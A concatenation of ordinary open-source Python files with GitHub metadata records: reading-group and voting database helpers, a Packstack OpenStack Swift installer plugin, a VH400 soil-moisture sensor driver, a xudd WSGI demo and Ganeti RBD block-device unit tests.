Group.objects(id=ObjectId(group_id)).update_one(push__members=new_member)
except Exception as e:
return type(e).__name__
# Add group member
reading_group.reload()
return reading_group
def create_group_list(user, list_name, group_id):
# Check if user has permission
# Create list
new_list = List(name=list_name).save()
# Append list reference to the group's list of lists
try:
Group.objects(id=ObjectId(group_id)).update_one(push__lists=new_list)
except DoesNotExist:
return None
return new_list
def get_user_groups(user):
groups = Group.objects(members=user)
if Group.objects(members=user).count() == 0:
return None
return groups
def get_group_lists(user, group_id):
try:
# Get group
group = Group.objects.get(id=ObjectId(group_id), members=user)
except DoesNotExist:
return None
return group
def check_user_in_group(user, group_id):
try:
# Check if user belongs to the group
Group.objects.get(id=ObjectId(group_id), members=user)
except DoesNotExist:
return None
return 0
def share_list_to_group(user, list_id, group_id):
try:
for group in group_id:
duplicate_list = deepcopy(List.objects.get(id=ObjectId(list_id)))
duplicate_list.id = None
duplicate_list.save()
# init the vote for each articles
init_vote(duplicate_list)
target_group = Group.objects.get(id=ObjectId(group))
Group.objects(id=target_group.id).update_one(push__lists=duplicate_list)
except Exception as e:
return type(e).__name__
def init_vote(the_list):
for article in the_list.articles:
Vote(article=article, list=the_list).save()
def check_vote_exist(list, article):
try:
# Try to retrieve the vote
vote = Vote.objects.get(list=list, article=article)
except DoesNotExist:
# If it does not exist, create a new one instead
vote = Vote(list=list, article=article).save()
return vote
def check_user_has_upvoted(user, vote):
try:
# Check if user has upvoted or not
Vote.objects.get(Q(id=vote.id) & Q(upvoter_list=user))
except DoesNotExist:
        # User has not upvoted
return False
return True
def check_user_has_downvoted(user, vote):
try:
# Check if user has downvoted or not
vote = Vote.objects.get(Q(id=vote.id) & Q(downvoter_list=user))
except DoesNotExist:
        # User has not downvoted
return False
return True
def upvote_article(user, group_id, list_id, article_id):
try:
# Resources check
article = Article.objects.get(id=ObjectId(article_id))
group = Group.objects.get(id=ObjectId(group_id), lists=ObjectId(list_id), members=user)
list = List.objects.get(id=ObjectId(list_id), articles=article)
# Create new vote
vote = check_vote_exist(list, article)
if check_user_has_upvoted(user, vote):
raise UserHasVoted('User cannot vote twice.')
# Revoke vote
if check_user_has_downvoted(user, vote):
Vote.objects(id=vote.id).update_one(pull__downvoter_list=user, vote_count=vote.vote_count + 1)
else:
# Upvote article
Vote.objects(id=vote.id).update_one(push__upvoter_list=user, vote_count=vote.vote_count+1)
except Exception as e:
return type(e).__name__
vote.reload()
return vote
def downvote_article(user, group_id, list_id, article_id):
try:
# Resources check
article = Article.objects.get(id=ObjectId(article_id))
group = Group.objects.get(id=ObjectId(group_id), lists=ObjectId(list_id), members=user)
list = List.objects.get(id=ObjectId(list_id), articles=article)
# Create new vote
vote = check_vote_exist(list, article)
if check_user_has_downvoted(user, vote):
raise UserHasVoted('User cannot vote twice.')
# User is just trying to take vote back
if check_user_has_upvoted(user, vote):
Vote.objects(id=vote.id).update_one(pull__upvoter_list=user, vote_count=vote.vote_count-1)
else:
# Downvote
Vote.objects(id=vote.id).update_one(push__downvoter_list=user, vote_count=vote.vote_count-1)
except Exception as e:
return type(e).__name__
vote.reload()
return vote
def get_vote_count(list_id, article_id):
try:
list = List.objects.get(id=ObjectId(list_id))
article = Article.objects.get(id=ObjectId(article_id))
vote = Vote.objects.get(Q(list=list) & Q(article=article))
except Exception as e:
return type(e).__name__
return vote.vote_count
def add_vote_count(group_list):
for i, article in enumerate(group_list['articles']):
group_list['articles'][i]['vote_count'] = get_vote_count(group_list['id'], article['id'])
return group_list
def partition_user_list(user, old_list_id, new_list_name, articles):
try:
# Get list and create new list
old_list = List.objects.get(id=ObjectId(old_list_id))
new_list = create_list(new_list_name, user)
article_buffer = list()
for a in articles:
article_buffer.append(Article.objects.get(id=ObjectId(a)))
# Add selected article into new list and remove from old list
List.objects(id=new_list.id).update_one(add_to_set__articles=article_buffer)
List.objects(id=old_list.id).update_one(pull_all__articles=article_buffer)
except Exception as e:
print(type(e).__name__)
return type(e).__name__
old_list.reload()
new_list.reload()
return old_list, new_list
def copy_article_to_user_list(user, base_list_id, article_id, target_list_id):
try:
# Get article and lists
article = Article.objects.get(id=ObjectId(article_id))
list1 = List.objects.get(Q(id=ObjectId(base_list_id)) & Q(articles=article))
list2 = List.objects.get(id=ObjectId(target_list_id))
Vote(article=article, list=list2).save()
# Update articles list
List.objects(id=list2.id).update_one(push__articles=article)
except Exception as e:
return type(e).__name__
def merge_user_ist(user, base_list_id, target_list_id):
try:
base_list = List.objects.get(id=ObjectId(base_list_id))
target_list = List.objects.get(id=ObjectId(target_list_id))
List.objects(id=target_list.id).update_one(add_to_set__articles=base_list.articles)
List.objects(id=base_list.id).delete()
except Exception as e:
return type(e).__name__
def invite_user(inviter, invitees_email, group_id):
try:
# Create new invitation object
group = Group.objects.get(id=ObjectId(group_id))
invitations = list()
for invitee_email in invitees_email:
if invitee_email != inviter.email:
invitee = User.objects.get(email=invitee_email)
invitations.append(Invitation(invitee=invitee, inviter=inviter, group=group).save())
except Exception as e:
return type(e).__name__
return invitations
def get_user_pending_invitation(user):
try:
        # Retrieve all of the user's pending invitations
pending_invitations = Invitation.objects(invitee=user)
except Exception as e:
return type(e).__name__
return pending_invitations
def accept_invitation(user, invitation_id):
try:
# Accept invitation
invitation = Invitation.objects.get(id=ObjectId(invitation_id))
if user != invitation.invitee:
raise ValueError
Group.objects(id=invitation.group.id).update_one(push__members=user)
Invitation.objects(id=invitation.id).delete()
except Exception as e:
return type(e).__name__
return invitation
def deny_invitation(user, invitation_id):
try:
        # Deny invitation
invitation = Invitation.objects.get(id=ObjectId(invitation_id))
if user != invitation.invitee:
raise ValueError
Invitation.objects(id=invitation.id).delete()
except Exception as e:
return type(e).__name__
return invitation
def share_article_to_group_list(user, base_list_id, article_id, group_id, target_list_id):
try:
# Check ownership
base_list = List.objects.get(id=ObjectId(base_list_id))
target_list = List.objects.get(id=ObjectId(target_list_id))
article = Article.objects.get(id=ObjectId(article_id))
Group.objects.get(Q(id=ObjectId(group_id)) & Q(lists=target_list))
User.objects.get(Q(id=user.id) & Q(lists=base_list))
# Add article ito the list
List.objects(id=target_list.id).update_one(push__articles=article)
# Init the vote object as well
Vote(article=article, list=target_list).save()
except Exception as e:
return type(e).__name__
| {
"content_hash": "baa5c4238e904e38ee565528ba2ff0c4",
"timestamp": "",
"source": "github",
"line_count": 650,
"max_line_length": 106,
"avg_line_length": 29.736923076923077,
"alnum_prop": 0.6319519892389673,
"repo_name": "TeamGhostBuster/restful-api",
"id": "cb01ff6a2d4f3d75c7739b91ef9d1217611d150b",
"size": "19329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/util/MongoUtil.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Makefile",
"bytes": "520"
},
{
"name": "Python",
"bytes": "101060"
}
],
"symlink_target": ""
} |
"""
Installs and configures OpenStack Swift
"""
import uuid
import logging
import os
from packstack.installer import validators
from packstack.installer import basedefs
import packstack.installer.common_utils as utils
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile, manifestfiles
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-SWIFT"
PLUGIN_NAME_COLORED = utils.getColoredText(PLUGIN_NAME, basedefs.BLUE)
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Swift configuration")
paramsList = [
{"CMD_OPTION" : "os-swift-proxy",
"USAGE" : "The IP address on which to install the Swift proxy service",
"PROMPT" : "Enter the IP address of the Swift proxy service",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ip, validators.validate_ssh],
"DEFAULT_VALUE" : utils.getLocalhostIP(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_PROXY_HOSTS", #XXX: Shouldn't be here CONFIG_SWIFT_PROXY_HOST?
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-ks-passwd",
"USAGE" : "The password to use for the Swift to authenticate with Keystone",
"PROMPT" : "Enter the password for the Swift Keystone access",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty],
"DEFAULT_VALUE" : uuid.uuid4().hex[:16],
"MASK_INPUT" : True,
"LOOSE_VALIDATION": False,
"CONF_NAME" : "CONFIG_SWIFT_KS_PW",
"USE_DEFAULT" : True,
"NEED_CONFIRM" : True,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage",
"USAGE" : "A comma separated list of IP addresses on which to install the Swift Storage services, each entry should take the format <ipaddress>[/dev], for example 127.0.0.1/vdb will install /dev/vdb on 127.0.0.1 as a swift storage device(packstack does not create the filesystem, you must do this first), if /dev is omitted Packstack will create a loopback device for a test setup",
"PROMPT" : "Enter the Swift Storage servers e.g. host/dev,host/dev",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_not_empty, validate_storage],
"DEFAULT_VALUE" : utils.getLocalhostIP(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_HOSTS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-zones",
"USAGE" : "Number of swift storage zones, this number MUST be no bigger than the number of storage devices configured",
"PROMPT" : "Enter the number of swift storage zones, MUST be no bigger than the number of storage devices configured",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_integer],
"DEFAULT_VALUE" : "1",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_ZONES",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-replicas",
"USAGE" : "Number of swift storage replicas, this number MUST be no bigger than the number of storage zones configured",
"PROMPT" : "Enter the number of swift storage replicas, MUST be no bigger than the number of storage zones configured",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_integer],
"DEFAULT_VALUE" : "1",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_REPLICAS",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
{"CMD_OPTION" : "os-swift-storage-fstype",
"USAGE" : "FileSystem type for storage nodes",
"PROMPT" : "Enter FileSystem type for storage nodes",
"OPTION_LIST" : ['xfs','ext4'],
"VALIDATORS" : [validators.validate_options],
"DEFAULT_VALUE" : "ext4",
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_SWIFT_STORAGE_FSTYPE",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "OSSWIFT",
"DESCRIPTION" : "OpenStack Swift Config parameters",
"PRE_CONDITION" : "CONFIG_SWIFT_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
def validate_storage(param, options=None):
for host in param.split(','):
host = host.split('/', 1)[0]
validators.validate_ip(host.strip(), options)
def initSequences(controller):
if controller.CONF['CONFIG_SWIFT_INSTALL'] != 'y':
return
steps = [
{'title': 'Adding Swift Keystone manifest entries', 'functions':[createkeystonemanifest]},
{'title': 'Adding Swift builder manifest entries', 'functions':[createbuildermanifest]},
{'title': 'Adding Swift proxy manifest entries', 'functions':[createproxymanifest]},
{'title': 'Adding Swift storage manifest entries', 'functions':[createstoragemanifest]},
{'title': 'Adding Swift common manifest entries', 'functions':[createcommonmanifest]},
]
controller.addSequence("Installing OpenStack Swift", [], [], steps)
def createkeystonemanifest():
manifestfile = "%s_keystone.pp"%controller.CONF['CONFIG_KEYSTONE_HOST']
controller.CONF['CONFIG_SWIFT_PROXY'] = controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'].split(',')[0]
manifestdata = getManifestTemplate("keystone_swift.pp")
appendManifestFile(manifestfile, manifestdata)
devices = []
def parse_devices(config_swift_storage_hosts):
"""
    Returns a list of dicts containing information about the Swift storage devices.
"""
device_number = 0
num_zones = int(controller.CONF["CONFIG_SWIFT_STORAGE_ZONES"])
for host in config_swift_storage_hosts.split(","):
host = host.strip()
device_number += 1
device = None
if '/' in host:
host, device = map(lambda x: x.strip(), host.split('/', 1))
zone = str((device_number % num_zones) + 1)
devices.append({'host': host, 'device': device, 'zone': zone,
'device_name': 'device%s' % device_number})
return devices
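# Illustrative example (hypothetical values, assuming CONFIG_SWIFT_STORAGE_ZONES is "1"):
# parse_devices("192.168.0.1/vdb,192.168.0.2") appends
#   {'host': '192.168.0.1', 'device': 'vdb', 'zone': '1', 'device_name': 'device1'}
#   {'host': '192.168.0.2', 'device': None, 'zone': '1', 'device_name': 'device2'}
# so hosts without an explicit /dev later fall back to the loopback device setup.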
# The ring file should be built and distributed before the storage services
# come up. Specifically the replicator crashes if the ring isn't present
def createbuildermanifest():
# TODO : put this on the proxy server, will need to change this later
controller.CONF['CONFIG_SWIFT_BUILDER_HOST'] = controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'].split(',')[0]
manifestfile = "%s_ring_swift.pp"%controller.CONF['CONFIG_SWIFT_BUILDER_HOST']
manifestdata = getManifestTemplate("swift_builder.pp")
# Add each device to the ring
devicename = 0
for device in parse_devices(controller.CONF["CONFIG_SWIFT_STORAGE_HOSTS"]):
host = device['host']
devicename = device['device_name']
zone = device['zone']
manifestdata = manifestdata + '\n@@ring_object_device { "%s:6000/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
manifestdata = manifestdata + '\n@@ring_container_device { "%s:6001/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
manifestdata = manifestdata + '\n@@ring_account_device { "%s:6002/%s":\n zone => %s,\n weight => 10, }'%(host, devicename, zone)
appendManifestFile(manifestfile, manifestdata, 'swiftbuilder')
def createproxymanifest():
manifestfile = "%s_swift.pp"%controller.CONF['CONFIG_SWIFT_PROXY_HOSTS']
manifestdata = getManifestTemplate("swift_proxy.pp")
# If the proxy server is also a storage server then swift::ringsync will be included for the storage server
if controller.CONF['CONFIG_SWIFT_PROXY_HOSTS'] not in [h['host'] for h in devices]:
manifestdata += 'swift::ringsync{["account","container","object"]:\n ring_server => "%s"\n}'%controller.CONF['CONFIG_SWIFT_BUILDER_HOST']
appendManifestFile(manifestfile, manifestdata)
def check_device(host, device):
"""
Raises ScriptRuntimeError if given device is not mounted on given
host.
"""
server = utils.ScriptRunner(host)
# the device MUST exist
cmd = 'ls -l /dev/%s'
server.append(cmd % device)
# if it is not mounted then we can use it
cmd = 'grep "/dev/%s " /proc/self/mounts || exit 0'
server.append(cmd % device)
# if it is mounted then the mount point has to be in /srv/node
cmd = 'grep "/dev/%s /srv/node" /proc/self/mounts && exit 0'
server.append(cmd % device)
# if we got here without exiting then we can't use this device
server.append('exit 1')
server.execute()
return False
def createstoragemanifest():
    # this needs to happen once per storage host
for host in set([device['host'] for device in devices]):
controller.CONF["CONFIG_SWIFT_STORAGE_CURRENT"] = host
manifestfile = "%s_swift.pp"%host
manifestdata = getManifestTemplate("swift_storage.pp")
appendManifestFile(manifestfile, manifestdata)
    # this needs to happen once per storage device
for device in devices:
host = device['host']
devicename = device['device_name']
device = device['device']
if device:
check_device(host, device)
manifestfile = "%s_swift.pp"%host
if device:
manifestdata = "\n" + 'swift::storage::%s{"%s":\n device => "/dev/%s",\n}'% (controller.CONF["CONFIG_SWIFT_STORAGE_FSTYPE"], devicename, device)
else:
controller.CONF["SWIFT_STORAGE_DEVICES"] = "'%s'"%devicename
manifestdata = "\n" + getManifestTemplate("swift_loopback.pp")
appendManifestFile(manifestfile, manifestdata)
def createcommonmanifest():
for manifestfile, marker in manifestfiles.getFiles():
if manifestfile.endswith("_swift.pp"):
data = getManifestTemplate("swift_common.pp")
appendManifestFile(os.path.split(manifestfile)[1], data)
| {
"content_hash": "d966e914d756b97655725e3ab7e9e38a",
"timestamp": "",
"source": "github",
"line_count": 245,
"max_line_length": 411,
"avg_line_length": 47.94285714285714,
"alnum_prop": 0.5720245189851865,
"repo_name": "skottler/packstack",
"id": "e06a02ffbb42e9cc480db69ef9d9b3dcb11bf62e",
"size": "11746",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "packstack/plugins/swift_600.py",
"mode": "33188",
"license": "apache-2.0",
"language": [],
"symlink_target": ""
} |
from common.adafruit.Adafruit_ADS1x15 import Adafruit_ADS1x15
# from threading import RLock # May be needed if we end up multiplexing readings with a 16:1 analog mux
class VH400MoistureSensor(object):
"""
This class supports the Vegetronix VH400 MoistureSensor
"""
ADS1115 = 0x01
def __init__(self, i2c_addr=0x49, pin=None, gain=4096, sps=256, readings_to_average=1):
"""
A Vegetronix VH400 MoistureSensor.
Some notes from https://github.com/adafruit/Adafruit-Raspberry-Pi-Python-Code/blob/master/Adafruit_ADS1x15/ads1x15_ex_singleended.py
Select the gain
gain = 6144 # +/- 6.144V
gain = 4096 # +/- 4.096V
gain = 2048 # +/- 2.048V
gain = 1024 # +/- 1.024V
gain = 512 # +/- 0.512V
gain = 256 # +/- 0.256V
Select the sample rate
sps = 8 # 8 samples per second
sps = 16 # 16 samples per second
sps = 32 # 32 samples per second
sps = 64 # 64 samples per second
sps = 128 # 128 samples per second
sps = 250 # 250 samples per second
sps = 475 # 475 samples per second
sps = 860 # 860 samples per second
        Possible ADS1x15 i2c addresses: 0x48, 0x49, 0x4a, 0x4b
        Our default is 0x49. This will probably be hard-coded on the board.
ADS1015 = 0x00 # 12-bit ADC
ADS1115 = 0x01 # 16-bit ADC
:param i2c_addr: i2c address of the ADS1115 chip
:type i2c_addr: hex
:param pin: Which ADC do we read when talking to this sensor?
:type pin: int
:param gain: Input gain. This shouldn't be changed from 4096 as the VH400 has a 0-3v output
:type gain: int
:param sps: How many samples per second will the ADC take? Lower = less noise, Higher = faster readings.
:type sps: int
:param readings_to_average: How many readings to we average before returning a value
:type readings_to_average: int
"""
self._i2c_addr = i2c_addr
self._pin = pin
self._gain = gain
self._sps = sps
self._adc = Adafruit_ADS1x15.ADS1x15(address=self._i2c_addr, ic=self.ADS1115)
self.readings_to_average = readings_to_average
@property
def percent(self):
"""
Return the Volumetric Water Content (VWC) % of the soil
VH400 Piecewise Curve:
Most curves can be approximated with linear segments of the form:
y= m*x-b,
where m is the slope of the line
The VH400's Voltage to VWC curve can be approximated with 4 segments of the form:
VWC= m*V-b
where V is voltage.
m= (VWC2 - VWC1)/(V2-V1)
where V1 and V2 are voltages recorded at the respective VWC levels of VWC1 and VWC2.
After m is determined, the y-axis intercept coefficient b can be found by inserting one of the end points into the equation:
b= m*v-VWC
Voltage Range Equation
0 to 1.1V VWC= 10*V-1
1.1V to 1.3V VWC= 25*V- 17.5
1.3V to 1.82V VWC= 48.08*V- 47.5
1.82V to 2.2V VWC= 26.32*V- 7.89
:return: float
"""
v = self.raw_voltage
res = 0
if 0.0 <= v <= 1.1:
res = 10 * v - 1
elif 1.1 < v <= 1.3:
res = 25 * v - 17.5
elif 1.3 < v <= 1.82:
res = 48.08 * v - 47.5
elif 1.82 < v:
res = 26.32 * v - 7.89
if res < 0:
return 0
else:
return res * 1.5 # Scale result to 100% when entire green stick is submerged in water
@property
def raw_voltage(self):
"""
Return the raw sensor voltage. Average readings before returning the value
:return: float
"""
reading = 0.0
for _i in range(self.readings_to_average):
reading += self._adc.readADCSingleEnded(self._pin, self._gain, self._sps)
return reading / self.readings_to_average / 1000.0
if __name__ == "__main__":
sensor0 = VH400MoistureSensor(pin=0)
print("Raw voltage: %s" % sensor0.raw_voltage)
print("Percent: %s" % sensor0.percent)
| {
"content_hash": "c73da1247ed7a89dae3282a52d6272ab",
"timestamp": "",
"source": "github",
"line_count": 126,
"max_line_length": 140,
"avg_line_length": 34.3968253968254,
"alnum_prop": 0.5592985694508538,
"repo_name": "mecworks/garden_pi",
"id": "e5da6ca424400a1b6cb33f2a5d4463e82fce6fcf",
"size": "4357",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "common/moisture_sensor.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "15566"
},
{
"name": "C++",
"bytes": "10994"
},
{
"name": "Makefile",
"bytes": "326"
},
{
"name": "Python",
"bytes": "130724"
},
{
"name": "Shell",
"bytes": "1867"
}
],
"symlink_target": ""
} |
from xudd.lib.server import Server
from xudd.lib.http import HTTP
from xudd.lib.wsgi import WSGI
from xudd.hive import Hive
import logging
def wsgi_app(environ, start_response):
response = start_response(200, {'Content-Type': 'text/plain'}.items())
response('Hello World!')
def serve():
logging.basicConfig(level=logging.DEBUG)
logging.getLogger('xudd.hive').setLevel(logging.INFO)
logging.getLogger('xudd.actor').setLevel(logging.INFO)
hive = Hive()
wsgi_id = hive.create_actor(WSGI, app=wsgi_app)
http_id = hive.create_actor(HTTP, request_handler=wsgi_id)
server_id = hive.create_actor(Server, request_handler=http_id)
hive.send_message(
to=server_id,
directive='listen')
hive.run()
if __name__ == '__main__':
serve()
| {
"content_hash": "f6e6a7c6b739feb60473d6c64ab02b47",
"timestamp": "",
"source": "github",
"line_count": 33,
"max_line_length": 74,
"avg_line_length": 24.09090909090909,
"alnum_prop": 0.6792452830188679,
"repo_name": "xudd/xudd",
"id": "0f27fb94889bb9cab7b98e1c7a1e0112574d06a4",
"size": "795",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xudd/demos/lib-server.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Hy",
"bytes": "691"
},
{
"name": "Python",
"bytes": "124594"
}
],
"symlink_target": ""
} |
"""Script for unittesting the bdev module"""
import os
import random
import unittest
from ganeti import compat
from ganeti import constants
from ganeti import errors
from ganeti import objects
from ganeti import utils
from ganeti.storage import bdev
import testutils
def _FakeRunCmd(success, stdout, cmd):
if success:
exit_code = 0
else:
exit_code = 1
return utils.RunResult(exit_code, None, stdout, "", cmd,
utils.process._TIMEOUT_NONE, 5)
class FakeStatResult(object):
def __init__(self, st_mode):
self.st_mode = st_mode
self.st_rdev = 0
class TestRADOSBlockDevice(testutils.GanetiTestCase):
"""Tests for bdev.RADOSBlockDevice volumes
"""
def setUp(self):
"""Set up input data"""
testutils.GanetiTestCase.setUp(self)
self.plain_output_old_ok = \
testutils.ReadTestData("bdev-rbd/plain_output_old_ok.txt")
self.plain_output_old_no_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_old_no_matches.txt")
self.plain_output_old_extra_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_old_extra_matches.txt")
self.plain_output_old_empty = \
testutils.ReadTestData("bdev-rbd/plain_output_old_empty.txt")
self.plain_output_new_ok = \
testutils.ReadTestData("bdev-rbd/plain_output_new_ok.txt")
self.plain_output_new_no_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_new_no_matches.txt")
self.plain_output_new_extra_matches = \
testutils.ReadTestData("bdev-rbd/plain_output_new_extra_matches.txt")
# This file is completely empty, and as such it's not shipped.
self.plain_output_new_empty = ""
self.json_output_ok = testutils.ReadTestData("bdev-rbd/json_output_ok.txt")
self.json_output_no_matches = \
testutils.ReadTestData("bdev-rbd/json_output_no_matches.txt")
self.json_output_extra_matches = \
testutils.ReadTestData("bdev-rbd/json_output_extra_matches.txt")
self.json_output_empty = \
testutils.ReadTestData("bdev-rbd/json_output_empty.txt")
self.output_invalid = testutils.ReadTestData("bdev-rbd/output_invalid.txt")
self.volume_name = "d7ab910a-4933-4ffe-88d0-faf2ce31390a.rbd.disk0"
self.test_unique_id = ("rbd", self.volume_name)
self.test_params = {
constants.LDP_POOL: "fake_pool"
}
def testParseRbdShowmappedJson(self):
parse_function = bdev.RADOSBlockDevice._ParseRbdShowmappedJson
self.assertEqual(parse_function(self.json_output_ok, self.volume_name),
"/dev/rbd3")
self.assertEqual(parse_function(self.json_output_empty, self.volume_name),
None)
self.assertEqual(parse_function(self.json_output_no_matches,
self.volume_name), None)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.json_output_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.output_invalid, self.volume_name)
def testParseRbdShowmappedPlain(self):
parse_function = bdev.RADOSBlockDevice._ParseRbdShowmappedPlain
self.assertEqual(parse_function(self.plain_output_new_ok,
self.volume_name), "/dev/rbd3")
self.assertEqual(parse_function(self.plain_output_old_ok,
self.volume_name), "/dev/rbd3")
self.assertEqual(parse_function(self.plain_output_new_empty,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_old_empty,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_new_no_matches,
self.volume_name), None)
self.assertEqual(parse_function(self.plain_output_old_no_matches,
self.volume_name), None)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.plain_output_new_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.plain_output_old_extra_matches, self.volume_name)
self.assertRaises(errors.BlockDeviceError, parse_function,
self.output_invalid, self.volume_name)
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.RADOSBlockDevice, "_UnmapVolumeFromBlockdev")
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceImport(self, attach_mock, unmap_mock, run_cmd_mock):
"""Test for bdev.RADOSBlockDevice.Import()"""
# Set up the mock objects return values
attach_mock.return_value = True
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
# Create a fake rbd volume
inst = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
# Desired output command
import_cmd = [constants.RBD_CMD, "import",
"-p", inst.rbd_pool,
"-", inst.rbd_name]
self.assertEqual(inst.Import(), import_cmd)
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceExport(self, attach_mock):
"""Test for bdev.RADOSBlockDevice.Export()"""
# Set up the mock object return value
attach_mock.return_value = True
# Create a fake rbd volume
inst = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
# Desired output command
export_cmd = [constants.RBD_CMD, "export",
"-p", inst.rbd_pool,
inst.rbd_name, "-"]
self.assertEqual(inst.Export(), export_cmd)
@testutils.patch_object(utils, "RunCmd")
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceCreate(self, attach_mock, run_cmd_mock):
"""Test for bdev.RADOSBlockDevice.Create() success"""
attach_mock.return_value = True
# This returns a successful RunCmd result
run_cmd_mock.return_value = _FakeRunCmd(True, "", "")
expect = bdev.RADOSBlockDevice(self.test_unique_id, [], 1024,
self.test_params, {})
got = bdev.RADOSBlockDevice.Create(self.test_unique_id, [], 1024, None,
self.test_params, False, {},
test_kwarg="test")
self.assertEqual(expect, got)
@testutils.patch_object(bdev.RADOSBlockDevice, "Attach")
def testRADOSBlockDeviceCreateFailure(self, attach_mock):
"""Test for bdev.RADOSBlockDevice.Create() failure with exclusive_storage
enabled
"""
attach_mock.return_value = True
self.assertRaises(errors.ProgrammerError, bdev.RADOSBlockDevice.Create,
self.test_unique_id, [], 1024, None, self.test_params,
True, {})
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttach(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach()"""
stat_mock.return_value = FakeStatResult(0x6000) # bitmask for S_ISBLK
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), True)
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttachFailureNotBlockdev(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach() failure, not a blockdev"""
stat_mock.return_value = FakeStatResult(0x0)
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), False)
@testutils.patch_object(bdev.RADOSBlockDevice, "_MapVolumeToBlockdev")
@testutils.patch_object(os, "stat")
def testAttachFailureNoDevice(self, stat_mock, map_mock):
"""Test for bdev.RADOSBlockDevice.Attach() failure, no device found"""
stat_mock.side_effect = OSError("No device found")
map_mock.return_value = "/fake/path"
dev = bdev.RADOSBlockDevice.__new__(bdev.RADOSBlockDevice)
dev.unique_id = self.test_unique_id
self.assertEqual(dev.Attach(), False)
class TestExclusiveStoragePvs(unittest.TestCase):
"""Test cases for functions dealing with LVM PV and exclusive storage"""
# Allowance for rounding
_EPS = 1e-4
_MARGIN = constants.PART_MARGIN + constants.PART_RESERVED + _EPS
@staticmethod
def _GenerateRandomPvInfo(rnd, name, vg):
# Granularity is .01 MiB
size = rnd.randint(1024 * 100, 10 * 1024 * 1024 * 100)
if rnd.choice([False, True]):
free = float(rnd.randint(0, size)) / 100.0
else:
free = float(size) / 100.0
size = float(size) / 100.0
attr = "a-"
return objects.LvmPvInfo(name=name, vg_name=vg, size=size, free=free,
attributes=attr)
def testGetStdPvSize(self):
"""Test cases for bdev.LogicalVolume._GetStdPvSize()"""
rnd = random.Random(9517)
for _ in range(0, 50):
# Identical volumes
pvi = self._GenerateRandomPvInfo(rnd, "disk", "myvg")
onesize = bdev.LogicalVolume._GetStdPvSize([pvi])
self.assertTrue(onesize <= pvi.size)
self.assertTrue(onesize > pvi.size * (1 - self._MARGIN))
for length in range(2, 10):
n_size = bdev.LogicalVolume._GetStdPvSize([pvi] * length)
self.assertEqual(onesize, n_size)
# Mixed volumes
for length in range(1, 10):
